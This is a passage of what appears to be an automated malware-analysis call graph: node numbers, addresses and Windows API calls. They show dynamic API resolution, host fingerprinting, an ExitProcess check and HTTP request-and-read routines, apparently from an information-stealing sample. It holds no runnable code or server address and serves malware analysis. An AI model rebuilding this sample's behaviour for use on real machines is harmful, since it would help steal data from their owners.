14229->14230 14231 6845c0 2 API calls 14230->14231 14232 6838c5 14231->14232 14233 6845c0 2 API calls 14232->14233 14234 6838de 14233->14234 14235 6845c0 2 API calls 14234->14235 14236 6838f7 14235->14236 14237 6845c0 2 API calls 14236->14237 14238 683910 14237->14238 14239 6845c0 2 API calls 14238->14239 14240 683929 14239->14240 14241 6845c0 2 API calls 14240->14241 14242 683942 14241->14242 14243 6845c0 2 API calls 14242->14243 14244 68395b 14243->14244 14245 6845c0 2 API calls 14244->14245 14246 683974 14245->14246 14247 6845c0 2 API calls 14246->14247 14248 68398d 14247->14248 14249 6845c0 2 API calls 14248->14249 14250 6839a6 14249->14250 14251 6845c0 2 API calls 14250->14251 14252 6839bf 14251->14252 14253 6845c0 2 API calls 14252->14253 14254 6839d8 14253->14254 14255 6845c0 2 API calls 14254->14255 14256 6839f1 14255->14256 14257 6845c0 2 API calls 14256->14257 14258 683a0a 14257->14258 14259 6845c0 2 API calls 14258->14259 14260 683a23 14259->14260 14261 6845c0 2 API calls 14260->14261 14262 683a3c 14261->14262 14263 6845c0 2 API calls 14262->14263 14264 683a55 14263->14264 14265 6845c0 2 API calls 14264->14265 14266 683a6e 14265->14266 14267 6845c0 2 API calls 14266->14267 14268 683a87 14267->14268 14269 6845c0 2 API calls 14268->14269 14270 683aa0 14269->14270 14271 6845c0 2 API calls 14270->14271 14272 683ab9 14271->14272 14273 6845c0 2 API calls 14272->14273 14274 683ad2 14273->14274 14275 6845c0 2 API calls 14274->14275 14276 683aeb 14275->14276 14277 6845c0 2 API calls 14276->14277 14278 683b04 14277->14278 14279 6845c0 2 API calls 14278->14279 14280 683b1d 14279->14280 14281 6845c0 2 API calls 14280->14281 14282 683b36 14281->14282 14283 6845c0 2 API calls 14282->14283 14284 683b4f 14283->14284 14285 6845c0 2 API calls 14284->14285 14286 683b68 14285->14286 14287 6845c0 2 API calls 14286->14287 14288 683b81 14287->14288 14289 6845c0 2 API calls 14288->14289 14290 683b9a 14289->14290 14291 6845c0 2 API calls 14290->14291 14292 683bb3 14291->14292 14293 6845c0 2 API calls 14292->14293 14294 683bcc 14293->14294 14295 6845c0 2 API calls 14294->14295 14296 683be5 14295->14296 14297 6845c0 2 API calls 14296->14297 14298 683bfe 14297->14298 14299 6845c0 2 API calls 14298->14299 14300 683c17 14299->14300 14301 6845c0 2 API calls 14300->14301 14302 683c30 14301->14302 14303 6845c0 2 API calls 14302->14303 14304 683c49 14303->14304 14305 6845c0 2 API calls 14304->14305 14306 683c62 14305->14306 14307 6845c0 2 API calls 14306->14307 14308 683c7b 14307->14308 14309 6845c0 2 API calls 14308->14309 14310 683c94 14309->14310 14311 6845c0 2 API calls 14310->14311 14312 683cad 14311->14312 14313 6845c0 2 API calls 14312->14313 14314 683cc6 14313->14314 14315 6845c0 2 API calls 14314->14315 14316 683cdf 14315->14316 14317 6845c0 2 API calls 14316->14317 14318 683cf8 14317->14318 14319 6845c0 2 API calls 14318->14319 14320 683d11 14319->14320 14321 6845c0 2 API calls 14320->14321 14322 683d2a 14321->14322 14323 6845c0 2 API calls 14322->14323 14324 683d43 14323->14324 14325 6845c0 2 API calls 14324->14325 14326 683d5c 14325->14326 14327 6845c0 2 API calls 14326->14327 14328 683d75 14327->14328 14329 6845c0 2 API calls 14328->14329 14330 683d8e 14329->14330 14331 6845c0 2 API calls 14330->14331 14332 683da7 14331->14332 14333 6845c0 2 API calls 14332->14333 14334 683dc0 14333->14334 14335 6845c0 2 API calls 14334->14335 14336 683dd9 14335->14336 14337 6845c0 2 API calls 14336->14337 14338 683df2 14337->14338 14339 6845c0 2 API calls 14338->14339 14340 683e0b 14339->14340 14341 6845c0 2 API calls 14340->14341 14342 683e24 14341->14342 14343 6845c0 2 API calls 14342->14343 14344 683e3d 14343->14344 14345 6845c0 2 API calls 14344->14345 14346 683e56 14345->14346 14347 6845c0 2 API calls 14346->14347 14348 683e6f 14347->14348 14349 6845c0 2 API calls 14348->14349 14350 683e88 14349->14350 14351 6845c0 2 API calls 14350->14351 14352 683ea1 14351->14352 14353 6845c0 2 API calls 14352->14353 14354 683eba 14353->14354 14355 6845c0 2 API calls 14354->14355 14356 683ed3 14355->14356 14357 6845c0 2 API calls 14356->14357 14358 683eec 14357->14358 14359 6845c0 2 API calls 14358->14359 14360 683f05 14359->14360 14361 6845c0 2 API calls 14360->14361 14362 683f1e 14361->14362 14363 6845c0 2 API calls 14362->14363 14364 683f37 14363->14364 14365 6845c0 2 API calls 14364->14365 14366 683f50 14365->14366 14367 6845c0 2 API calls 14366->14367 14368 683f69 14367->14368 14369 6845c0 2 API calls 14368->14369 14370 683f82 14369->14370 14371 6845c0 2 API calls 14370->14371 14372 683f9b 14371->14372 14373 6845c0 2 API calls 14372->14373 14374 683fb4 14373->14374 14375 6845c0 2 API calls 14374->14375 14376 683fcd 14375->14376 14377 6845c0 2 API calls 14376->14377 14378 683fe6 14377->14378 14379 6845c0 2 API calls 14378->14379 14380 683fff 14379->14380 14381 6845c0 2 API calls 14380->14381 14382 684018 14381->14382 14383 6845c0 2 API calls 14382->14383 14384 684031 14383->14384 14385 6845c0 2 API calls 14384->14385 14386 68404a 14385->14386 14387 6845c0 2 API calls 14386->14387 14388 684063 14387->14388 14389 6845c0 2 API calls 14388->14389 14390 68407c 14389->14390 14391 6845c0 2 API calls 14390->14391 14392 684095 14391->14392 14393 6845c0 2 API calls 14392->14393 14394 6840ae 14393->14394 14395 6845c0 2 API calls 14394->14395 14396 6840c7 14395->14396 14397 6845c0 2 API calls 14396->14397 14398 6840e0 14397->14398 14399 6845c0 2 API calls 14398->14399 14400 6840f9 14399->14400 14401 6845c0 2 API calls 14400->14401 14402 684112 14401->14402 14403 6845c0 2 API calls 14402->14403 14404 68412b 14403->14404 14405 6845c0 2 API calls 14404->14405 14406 684144 14405->14406 14407 6845c0 2 API calls 14406->14407 14408 68415d 14407->14408 14409 6845c0 2 API calls 14408->14409 14410 684176 14409->14410 14411 6845c0 2 API calls 14410->14411 14412 68418f 14411->14412 14413 6845c0 2 API calls 14412->14413 14414 6841a8 14413->14414 14415 6845c0 2 API calls 14414->14415 14416 6841c1 14415->14416 14417 6845c0 2 API calls 14416->14417 14418 6841da 14417->14418 14419 6845c0 2 API calls 14418->14419 14420 6841f3 14419->14420 14421 6845c0 2 API calls 14420->14421 14422 68420c 14421->14422 14423 6845c0 2 API calls 14422->14423 14424 684225 14423->14424 14425 6845c0 2 API calls 14424->14425 14426 68423e 14425->14426 14427 6845c0 2 API calls 14426->14427 14428 684257 14427->14428 14429 6845c0 2 API calls 14428->14429 14430 684270 14429->14430 14431 6845c0 2 API calls 14430->14431 14432 684289 14431->14432 14433 6845c0 2 API calls 14432->14433 14434 6842a2 14433->14434 14435 6845c0 2 API calls 14434->14435 14436 6842bb 14435->14436 14437 6845c0 2 API calls 14436->14437 14438 6842d4 14437->14438 14439 6845c0 2 API calls 14438->14439 14440 6842ed 14439->14440 14441 6845c0 2 API calls 14440->14441 14442 684306 14441->14442 14443 6845c0 2 API calls 14442->14443 14444 68431f 14443->14444 14445 6845c0 2 API calls 14444->14445 14446 684338 14445->14446 14447 6845c0 2 API calls 14446->14447 14448 684351 14447->14448 14449 6845c0 2 API calls 14448->14449 14450 68436a 14449->14450 14451 6845c0 2 API calls 14450->14451 14452 684383 14451->14452 14453 6845c0 2 API calls 14452->14453 14454 68439c 14453->14454 14455 6845c0 2 API calls 14454->14455 14456 6843b5 14455->14456 14457 6845c0 2 API calls 14456->14457 14458 6843ce 14457->14458 14459 6845c0 2 API calls 14458->14459 14460 6843e7 14459->14460 14461 6845c0 2 API calls 14460->14461 14462 684400 14461->14462 14463 6845c0 2 API calls 14462->14463 14464 684419 14463->14464 14465 6845c0 2 API calls 14464->14465 14466 684432 14465->14466 14467 6845c0 2 API calls 14466->14467 14468 68444b 14467->14468 14469 6845c0 2 API calls 14468->14469 14470 684464 14469->14470 14471 6845c0 2 API calls 14470->14471 14472 68447d 14471->14472 14473 6845c0 2 API calls 14472->14473 14474 684496 14473->14474 14475 6845c0 2 API calls 14474->14475 14476 6844af 14475->14476 14477 6845c0 2 API calls 14476->14477 14478 6844c8 14477->14478 14479 6845c0 2 API calls 14478->14479 14480 6844e1 14479->14480 14481 6845c0 2 API calls 14480->14481 14482 6844fa 14481->14482 14483 6845c0 2 API calls 14482->14483 14484 684513 14483->14484 14485 6845c0 2 API calls 14484->14485 14486 68452c 14485->14486 14487 6845c0 2 API calls 14486->14487 14488 684545 14487->14488 14489 6845c0 2 API calls 14488->14489 14490 68455e 14489->14490 14491 6845c0 2 API calls 14490->14491 14492 684577 14491->14492 14493 6845c0 2 API calls 14492->14493 14494 684590 14493->14494 14495 6845c0 2 API calls 14494->14495 14496 6845a9 14495->14496 14497 699c10 14496->14497 14498 699c20 43 API calls 14497->14498 14499 69a036 8 API calls 14497->14499 14498->14499 14500 69a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14499->14500 14501 69a146 14499->14501 14500->14501 14502 69a153 8 API calls 14501->14502 14503 69a216 14501->14503 14502->14503 14504 69a298 14503->14504 14505 69a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14503->14505 14506 69a2a5 6 API calls 14504->14506 14507 69a337 14504->14507 14505->14504 14506->14507 14508 69a41f 14507->14508 14509 69a344 9 API calls 14507->14509 14510 69a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14508->14510 14511 69a4a2 14508->14511 14509->14508 14510->14511 14512 69a4ab GetProcAddress GetProcAddress 14511->14512 14513 69a4dc 14511->14513 14512->14513 14514 69a515 14513->14514 14515 69a4e5 GetProcAddress GetProcAddress 14513->14515 14516 69a612 14514->14516 14517 69a522 10 API calls 14514->14517 14515->14514 14518 69a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14516->14518 14519 69a67d 14516->14519 14517->14516 14518->14519 14520 69a69e 14519->14520 14521 69a686 GetProcAddress 14519->14521 14522 695ca3 14520->14522 14523 69a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14520->14523 14521->14520 14524 681590 14522->14524 14523->14522 15645 681670 14524->15645 14527 69a7a0 lstrcpy 14528 6815b5 14527->14528 14529 69a7a0 lstrcpy 14528->14529 14530 6815c7 14529->14530 14531 69a7a0 lstrcpy 14530->14531 14532 6815d9 14531->14532 14533 69a7a0 lstrcpy 14532->14533 14534 681663 14533->14534 14535 695510 14534->14535 14536 695521 14535->14536 14537 69a820 2 API calls 14536->14537 14538 69552e 14537->14538 14539 69a820 2 API calls 14538->14539 14540 69553b 14539->14540 14541 69a820 2 API calls 14540->14541 14542 695548 14541->14542 14543 69a740 lstrcpy 14542->14543 14544 695555 14543->14544 14545 69a740 lstrcpy 14544->14545 14546 695562 14545->14546 14547 69a740 lstrcpy 14546->14547 14548 69556f 14547->14548 14549 69a740 lstrcpy 14548->14549 14589 69557c 14549->14589 14550 69a740 lstrcpy 14550->14589 14551 695643 StrCmpCA 14551->14589 14552 6956a0 StrCmpCA 14553 6957dc 14552->14553 14552->14589 14554 69a8a0 lstrcpy 14553->14554 14555 6957e8 14554->14555 14556 69a820 2 API calls 14555->14556 14558 6957f6 14556->14558 14557 69a820 lstrlen lstrcpy 14557->14589 14560 69a820 2 API calls 14558->14560 14559 695856 StrCmpCA 14561 695991 14559->14561 14559->14589 14564 695805 14560->14564 14563 69a8a0 lstrcpy 14561->14563 14562 69a7a0 lstrcpy 14562->14589 14565 69599d 14563->14565 14566 681670 lstrcpy 14564->14566 14568 69a820 2 API calls 14565->14568 14587 695811 14566->14587 14567 681590 lstrcpy 14567->14589 14569 6959ab 14568->14569 14572 69a820 2 API calls 14569->14572 14570 695a0b StrCmpCA 14573 695a28 14570->14573 14574 695a16 Sleep 14570->14574 14571 6952c0 25 API calls 14571->14589 14575 6959ba 14572->14575 14576 69a8a0 lstrcpy 14573->14576 14574->14589 14578 681670 lstrcpy 14575->14578 14579 695a34 14576->14579 14577 69a8a0 lstrcpy 14577->14589 14578->14587 14580 69a820 2 API calls 14579->14580 14582 695a43 14580->14582 14581 6951f0 20 API calls 14581->14589 14583 69a820 2 API calls 14582->14583 14585 695a52 14583->14585 14584 69578a StrCmpCA 14584->14589 14586 681670 lstrcpy 14585->14586 14586->14587 14587->13642 14588 69593f StrCmpCA 14588->14589 14589->14550 14589->14551 14589->14552 14589->14557 14589->14559 14589->14562 14589->14567 14589->14570 14589->14571 14589->14577 14589->14581 14589->14584 14589->14588 14591 69754c 14590->14591 14592 697553 GetVolumeInformationA 14590->14592 14591->14592 14593 697591 14592->14593 14594 6975fc GetProcessHeap RtlAllocateHeap 14593->14594 14595 697619 14594->14595 14596 697628 wsprintfA 14594->14596 14597 69a740 lstrcpy 14595->14597 14598 69a740 lstrcpy 14596->14598 14599 695da7 14597->14599 14598->14599 14599->13663 14601 69a7a0 lstrcpy 14600->14601 14602 684899 14601->14602 15654 6847b0 14602->15654 14604 6848a5 14605 69a740 lstrcpy 14604->14605 14606 6848d7 14605->14606 14607 69a740 lstrcpy 14606->14607 14608 6848e4 14607->14608 14609 69a740 lstrcpy 14608->14609 14610 6848f1 14609->14610 14611 69a740 lstrcpy 14610->14611 14612 6848fe 14611->14612 14613 69a740 lstrcpy 14612->14613 14614 68490b InternetOpenA StrCmpCA 14613->14614 14615 684944 14614->14615 14616 684ecb InternetCloseHandle 14615->14616 15660 698b60 14615->15660 14618 684ee8 14616->14618 15675 689ac0 CryptStringToBinaryA 14618->15675 14619 684963 15668 69a920 14619->15668 14623 684976 14624 69a8a0 lstrcpy 14623->14624 14629 68497f 14624->14629 14625 69a820 2 API calls 14626 684f05 14625->14626 14627 69a9b0 4 API calls 14626->14627 14630 684f1b 14627->14630 14628 684f27 ctype 14632 69a7a0 lstrcpy 14628->14632 14633 69a9b0 4 API calls 14629->14633 14631 69a8a0 lstrcpy 14630->14631 14631->14628 14645 684f57 14632->14645 14634 6849a9 14633->14634 14635 69a8a0 lstrcpy 14634->14635 14636 6849b2 14635->14636 14637 69a9b0 4 API calls 14636->14637 14638 6849d1 14637->14638 14639 69a8a0 lstrcpy 14638->14639 14640 6849da 14639->14640 14641 69a920 3 API calls 14640->14641 14642 6849f8 14641->14642 14643 69a8a0 lstrcpy 14642->14643 14644 684a01 14643->14644 14646 69a9b0 4 API calls 14644->14646 14645->13666 14647 684a20 14646->14647 14648 69a8a0 lstrcpy 14647->14648 14649 684a29 14648->14649 14650 69a9b0 4 API calls 14649->14650 14651 684a48 14650->14651 14652 69a8a0 lstrcpy 14651->14652 14653 684a51 14652->14653 14654 69a9b0 4 API calls 14653->14654 14655 684a7d 14654->14655 14656 69a920 3 API calls 14655->14656 14657 684a84 14656->14657 14658 69a8a0 lstrcpy 14657->14658 14659 684a8d 14658->14659 14660 684aa3 InternetConnectA 14659->14660 14660->14616 14661 684ad3 HttpOpenRequestA 14660->14661 14663 684b28 14661->14663 14664 684ebe InternetCloseHandle 14661->14664 14665 69a9b0 4 API calls 14663->14665 14664->14616 14666 684b3c 14665->14666 14667 69a8a0 lstrcpy 14666->14667 14668 684b45 14667->14668 14669 69a920 3 API calls 14668->14669 14670 684b63 14669->14670 14671 69a8a0 lstrcpy 14670->14671 14672 684b6c 14671->14672 14673 69a9b0 4 API calls 14672->14673 14674 684b8b 14673->14674 14675 69a8a0 lstrcpy 14674->14675 14676 684b94 14675->14676 14677 69a9b0 4 API calls 14676->14677 14678 684bb5 14677->14678 14679 69a8a0 lstrcpy 14678->14679 14680 684bbe 14679->14680 14681 69a9b0 4 API calls 14680->14681 14682 684bde 14681->14682 14683 69a8a0 lstrcpy 14682->14683 14684 684be7 14683->14684 14685 69a9b0 4 API calls 14684->14685 14686 684c06 14685->14686 14687 69a8a0 lstrcpy 14686->14687 14688 684c0f 14687->14688 14689 69a920 3 API calls 14688->14689 14690 684c2d 14689->14690 14691 69a8a0 lstrcpy 14690->14691 14692 684c36 14691->14692 14693 69a9b0 4 API calls 14692->14693 14694 684c55 14693->14694 14695 69a8a0 lstrcpy 14694->14695 14696 684c5e 14695->14696 14697 69a9b0 4 API calls 14696->14697 14698 684c7d 14697->14698 14699 69a8a0 lstrcpy 14698->14699 14700 684c86 14699->14700 14701 69a920 3 API calls 14700->14701 14702 684ca4 14701->14702 14703 69a8a0 lstrcpy 14702->14703 14704 684cad 14703->14704 14705 69a9b0 4 API calls 14704->14705 14706 684ccc 14705->14706 14707 69a8a0 lstrcpy 14706->14707 14708 684cd5 14707->14708 14709 69a9b0 4 API calls 14708->14709 14710 684cf6 14709->14710 14711 69a8a0 lstrcpy 14710->14711 14712 684cff 14711->14712 14713 69a9b0 4 API calls 14712->14713 14714 684d1f 14713->14714 14715 69a8a0 lstrcpy 14714->14715 14716 684d28 14715->14716 14717 69a9b0 4 API calls 14716->14717 14718 684d47 14717->14718 14719 69a8a0 lstrcpy 14718->14719 14720 684d50 14719->14720 14721 69a920 3 API calls 14720->14721 14722 684d6e 14721->14722 14723 69a8a0 lstrcpy 14722->14723 14724 684d77 14723->14724 14725 69a740 lstrcpy 14724->14725 14726 684d92 14725->14726 14727 69a920 3 API calls 14726->14727 14728 684db3 14727->14728 14729 69a920 3 API calls 14728->14729 14730 684dba 14729->14730 14731 69a8a0 lstrcpy 14730->14731 14732 684dc6 14731->14732 14733 684de7 lstrlen 14732->14733 14734 684dfa 14733->14734 14735 684e03 lstrlen 14734->14735 15674 69aad0 14735->15674 14737 684e13 HttpSendRequestA 14738 684e32 InternetReadFile 14737->14738 14739 684e67 InternetCloseHandle 14738->14739 14744 684e5e 14738->14744 14742 69a800 14739->14742 14741 69a9b0 4 API calls 14741->14744 14742->14664 14743 69a8a0 lstrcpy 14743->14744 14744->14738 14744->14739 14744->14741 14744->14743 15681 69aad0 14745->15681 14747 6917c4 StrCmpCA 14748 6917cf ExitProcess 14747->14748 14749 6917d7 14747->14749 14750 6919c2 14749->14750 14751 6918ad StrCmpCA 14749->14751 14752 6918cf StrCmpCA 14749->14752 14753 69185d StrCmpCA 14749->14753 14754 69187f StrCmpCA 14749->14754 14755 6918f1 StrCmpCA 14749->14755 14756 691951 StrCmpCA 14749->14756 14757 691970 StrCmpCA 14749->14757 14758 691913 StrCmpCA 14749->14758 14759 691932 StrCmpCA 14749->14759 14760 69a820 lstrlen lstrcpy 14749->14760 14750->13668 14751->14749 14752->14749 14753->14749 14754->14749 14755->14749 14756->14749 14757->14749 14758->14749 14759->14749 14760->14749 14762 69a7a0 lstrcpy 14761->14762 14763 685979 14762->14763 14764 6847b0 2 API calls 14763->14764 14765 685985 14764->14765 14766 69a740 lstrcpy 14765->14766 14767 6859ba 14766->14767 14768 69a740 lstrcpy 14767->14768 14769 6859c7 14768->14769 14770 69a740 lstrcpy 14769->14770 14771 6859d4 14770->14771 14772 69a740 lstrcpy 14771->14772 14773 6859e1 14772->14773 14774 69a740 lstrcpy 14773->14774 14775 6859ee InternetOpenA StrCmpCA 14774->14775 14776 685a1d 14775->14776 14777 685fc3 InternetCloseHandle 14776->14777 14778 698b60 3 API calls 14776->14778 14779 685fe0 14777->14779 14780 685a3c 14778->14780 14782 689ac0 4 API calls 14779->14782 14781 69a920 3 API calls 14780->14781 14784 685a4f 14781->14784 14783 685fe6 14782->14783 14786 69a820 2 API calls 14783->14786 14789 68601f ctype 14783->14789 14785 69a8a0 lstrcpy 14784->14785 14790 685a58 14785->14790 14787 685ffd 14786->14787 14788 69a9b0 4 API calls 14787->14788 14791 686013 14788->14791 14793 69a7a0 lstrcpy 14789->14793 14794 69a9b0 4 API calls 14790->14794 14792 69a8a0 lstrcpy 14791->14792 14792->14789 14802 68604f 14793->14802 14795 685a82 14794->14795 14796 69a8a0 lstrcpy 14795->14796 14797 685a8b 14796->14797 14798 69a9b0 4 API calls 14797->14798 14799 685aaa 14798->14799 14800 69a8a0 lstrcpy 14799->14800 14801 685ab3 14800->14801 14803 69a920 3 API calls 14801->14803 14802->13674 14804 685ad1 14803->14804 14805 69a8a0 lstrcpy 14804->14805 14806 685ada 14805->14806 14807 69a9b0 4 API calls 14806->14807 14808 685af9 14807->14808 14809 69a8a0 lstrcpy 14808->14809 14810 685b02 14809->14810 14811 69a9b0 4 API calls 14810->14811 14812 685b21 14811->14812 14813 69a8a0 lstrcpy 14812->14813 14814 685b2a 14813->14814 14815 69a9b0 4 API calls 14814->14815 14816 685b56 14815->14816 14817 69a920 3 API calls 14816->14817 14818 685b5d 14817->14818 14819 69a8a0 lstrcpy 14818->14819 14820 685b66 14819->14820 14821 685b7c InternetConnectA 14820->14821 14821->14777 14822 685bac HttpOpenRequestA 14821->14822 14824 685c0b 14822->14824 14825 685fb6 InternetCloseHandle 14822->14825 14826 69a9b0 4 API calls 14824->14826 14825->14777 14827 685c1f 14826->14827 14828 69a8a0 lstrcpy 14827->14828 14829 685c28 14828->14829 14830 69a920 3 API calls 14829->14830 14831 685c46 14830->14831 14832 69a8a0 lstrcpy 14831->14832 14833 685c4f 14832->14833 14834 69a9b0 4 API calls 14833->14834 14835 685c6e 14834->14835 14836 69a8a0 lstrcpy 14835->14836 14837 685c77 14836->14837 14838 69a9b0 4 API calls 14837->14838 14839 685c98 14838->14839 14840 69a8a0 lstrcpy 14839->14840 14841 685ca1 14840->14841 14842 69a9b0 4 API calls 14841->14842 14843 685cc1 14842->14843 14844 69a8a0 lstrcpy 14843->14844 14845 685cca 14844->14845 14846 69a9b0 4 API calls 14845->14846 14847 685ce9 14846->14847 14848 69a8a0 lstrcpy 14847->14848 14849 685cf2 14848->14849 14850 69a920 3 API calls 14849->14850 14851 685d10 14850->14851 14852 69a8a0 lstrcpy 14851->14852 14853 685d19 14852->14853 14854 69a9b0 4 API calls 14853->14854 14855 685d38 14854->14855 14856 69a8a0 lstrcpy 14855->14856 14857 685d41 14856->14857 14858 69a9b0 4 API calls 14857->14858 14859 685d60 14858->14859 14860 69a8a0 lstrcpy 14859->14860 14861 685d69 14860->14861 14862 69a920 3 API calls 14861->14862 14863 685d87 14862->14863 14864 69a8a0 lstrcpy 14863->14864 14865 685d90 14864->14865 14866 69a9b0 4 API calls 14865->14866 14867 685daf 14866->14867 14868 69a8a0 lstrcpy 14867->14868 14869 685db8 14868->14869 14870 69a9b0 4 API calls 14869->14870 14871 685dd9 14870->14871 14872 69a8a0 lstrcpy 14871->14872 14873 685de2 14872->14873 14874 69a9b0 4 API calls 14873->14874 14875 685e02 14874->14875 14876 69a8a0 lstrcpy 14875->14876 14877 685e0b 14876->14877 14878 69a9b0 4 API calls 14877->14878 14879 685e2a 14878->14879 14880 69a8a0 lstrcpy 14879->14880 14881 685e33 14880->14881 14882 69a920 3 API calls 14881->14882 14883 685e54 14882->14883 14884 69a8a0 lstrcpy 14883->14884 14885 685e5d 14884->14885 14886 685e70 lstrlen 14885->14886 15682 69aad0 14886->15682 14888 685e81 lstrlen GetProcessHeap RtlAllocateHeap 15683 69aad0 14888->15683 14890 685eae lstrlen 14891 685ebe 14890->14891 14892 685ed7 lstrlen 14891->14892 14893 685ee7 14892->14893 14894 685ef0 lstrlen 14893->14894 14895 685f04 14894->14895 14896 685f1a lstrlen 14895->14896 15684 69aad0 14896->15684 14898 685f2a HttpSendRequestA 14899 685f35 InternetReadFile 14898->14899 14900 685f6a InternetCloseHandle 14899->14900 14904 685f61 14899->14904 14900->14825 14902 69a9b0 4 API calls 14902->14904 14903 69a8a0 lstrcpy 14903->14904 14904->14899 14904->14900 14904->14902 14904->14903 14907 691077 14905->14907 14906 691151 14906->13676 14907->14906 14908 69a820 lstrlen lstrcpy 14907->14908 14908->14907 14910 690db7 14909->14910 14911 690ea4 StrCmpCA 14910->14911 14912 690e27 StrCmpCA 14910->14912 14913 690e67 StrCmpCA 14910->14913 14914 690f17 14910->14914 14915 69a820 lstrlen lstrcpy 14910->14915 14911->14910 14912->14910 14913->14910 14914->13684 14915->14910 14919 690f67 14916->14919 14917 691044 14917->13692 14918 690fb2 StrCmpCA 14918->14919 14919->14917 14919->14918 14920 69a820 lstrlen lstrcpy 14919->14920 14920->14919 14922 69a740 lstrcpy 14921->14922 14923 691a26 14922->14923 14924 69a9b0 4 API calls 14923->14924 14925 691a37 14924->14925 14926 69a8a0 lstrcpy 14925->14926 14927 691a40 14926->14927 14928 69a9b0 4 API calls 14927->14928 14929 691a5b 14928->14929 14930 69a8a0 lstrcpy 14929->14930 14931 691a64 14930->14931 14932 69a9b0 4 API calls 14931->14932 14933 691a7d 14932->14933 14934 69a8a0 lstrcpy 14933->14934 14935 691a86 14934->14935 14936 69a9b0 4 API calls 14935->14936 14937 691aa1 14936->14937 14938 69a8a0 lstrcpy 14937->14938 14939 691aaa 14938->14939 14940 69a9b0 4 API calls 14939->14940 14941 691ac3 14940->14941 14942 69a8a0 lstrcpy 14941->14942 14943 691acc 14942->14943 14944 69a9b0 4 API calls 14943->14944 14945 691ae7 14944->14945 14946 69a8a0 lstrcpy 14945->14946 14947 691af0 14946->14947 14948 69a9b0 4 API calls 14947->14948 14949 691b09 14948->14949 14950 69a8a0 lstrcpy 14949->14950 14951 691b12 14950->14951 14952 69a9b0 4 API calls 14951->14952 14953 691b2d 14952->14953 14954 69a8a0 lstrcpy 14953->14954 14955 691b36 14954->14955 14956 69a9b0 4 API calls 14955->14956 14957 691b4f 14956->14957 14958 69a8a0 lstrcpy 14957->14958 14959 691b58 14958->14959 14960 69a9b0 4 API calls 14959->14960 14961 691b76 14960->14961 14962 69a8a0 lstrcpy 14961->14962 14963 691b7f 14962->14963 14964 697500 6 API calls 14963->14964 14965 691b96 14964->14965 14966 69a920 3 API calls 14965->14966 14967 691ba9 14966->14967 14968 69a8a0 lstrcpy 14967->14968 14969 691bb2 14968->14969 14970 69a9b0 4 API calls 14969->14970 14971 691bdc 14970->14971 14972 69a8a0 lstrcpy 14971->14972 14973 691be5 14972->14973 14974 69a9b0 4 API calls 14973->14974 14975 691c05 14974->14975 14976 69a8a0 lstrcpy 14975->14976 14977 691c0e 14976->14977 15685 697690 GetProcessHeap RtlAllocateHeap 14977->15685 14980 69a9b0 4 API calls 14981 691c2e 14980->14981 14982 69a8a0 lstrcpy 14981->14982 14983 691c37 14982->14983 14984 69a9b0 4 API calls 14983->14984 14985 691c56 14984->14985 14986 69a8a0 lstrcpy 14985->14986 14987 691c5f 14986->14987 14988 69a9b0 4 API calls 14987->14988 14989 691c80 14988->14989 14990 69a8a0 lstrcpy 14989->14990 14991 691c89 14990->14991 15692 6977c0 GetCurrentProcess IsWow64Process 14991->15692 14994 69a9b0 4 API calls 14995 691ca9 14994->14995 14996 69a8a0 lstrcpy 14995->14996 14997 691cb2 14996->14997 14998 69a9b0 4 API calls 14997->14998 14999 691cd1 14998->14999 15000 69a8a0 lstrcpy 14999->15000 15001 691cda 15000->15001 15002 69a9b0 4 API calls 15001->15002 15003 691cfb 15002->15003 15004 69a8a0 lstrcpy 15003->15004 15005 691d04 15004->15005 15006 697850 3 API calls 15005->15006 15007 691d14 15006->15007 15008 69a9b0 4 API calls 15007->15008 15009 691d24 15008->15009 15010 69a8a0 lstrcpy 15009->15010 15011 691d2d 15010->15011 15012 69a9b0 4 API calls 15011->15012 15013 691d4c 15012->15013 15014 69a8a0 lstrcpy 15013->15014 15015 691d55 15014->15015 15016 69a9b0 4 API calls 15015->15016 15017 691d75 15016->15017 15018 69a8a0 lstrcpy 15017->15018 15019 691d7e 15018->15019 15020 6978e0 3 API calls 15019->15020 15021 691d8e 15020->15021 15022 69a9b0 4 API calls 15021->15022 15023 691d9e 15022->15023 15024 69a8a0 lstrcpy 15023->15024 15025 691da7 15024->15025 15026 69a9b0 4 API calls 15025->15026 15027 691dc6 15026->15027 15028 69a8a0 lstrcpy 15027->15028 15029 691dcf 15028->15029 15030 69a9b0 4 API calls 15029->15030 15031 691df0 15030->15031 15032 69a8a0 lstrcpy 15031->15032 15033 691df9 15032->15033 15694 697980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15033->15694 15036 69a9b0 4 API calls 15037 691e19 15036->15037 15038 69a8a0 lstrcpy 15037->15038 15039 691e22 15038->15039 15040 69a9b0 4 API calls 15039->15040 15041 691e41 15040->15041 15042 69a8a0 lstrcpy 15041->15042 15043 691e4a 15042->15043 15044 69a9b0 4 API calls 15043->15044 15045 691e6b 15044->15045 15046 69a8a0 lstrcpy 15045->15046 15047 691e74 15046->15047 15696 697a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15047->15696 15050 69a9b0 4 API calls 15051 691e94 15050->15051 15052 69a8a0 lstrcpy 15051->15052 15053 691e9d 15052->15053 15054 69a9b0 4 API calls 15053->15054 15055 691ebc 15054->15055 15056 69a8a0 lstrcpy 15055->15056 15057 691ec5 15056->15057 15058 69a9b0 4 API calls 15057->15058 15059 691ee5 15058->15059 15060 69a8a0 lstrcpy 15059->15060 15061 691eee 15060->15061 15699 697b00 GetUserDefaultLocaleName 15061->15699 15064 69a9b0 4 API calls 15065 691f0e 15064->15065 15066 69a8a0 lstrcpy 15065->15066 15067 691f17 15066->15067 15068 69a9b0 4 API calls 15067->15068 15069 691f36 15068->15069 15070 69a8a0 lstrcpy 15069->15070 15071 691f3f 15070->15071 15072 69a9b0 4 API calls 15071->15072 15073 691f60 15072->15073 15074 69a8a0 lstrcpy 15073->15074 15075 691f69 15074->15075 15703 697b90 15075->15703 15077 691f80 15078 69a920 3 API calls 15077->15078 15079 691f93 15078->15079 15080 69a8a0 lstrcpy 15079->15080 15081 691f9c 15080->15081 15082 69a9b0 4 API calls 15081->15082 15083 691fc6 15082->15083 15084 69a8a0 lstrcpy 15083->15084 15085 691fcf 15084->15085 15086 69a9b0 4 API calls 15085->15086 15087 691fef 15086->15087 15088 69a8a0 lstrcpy 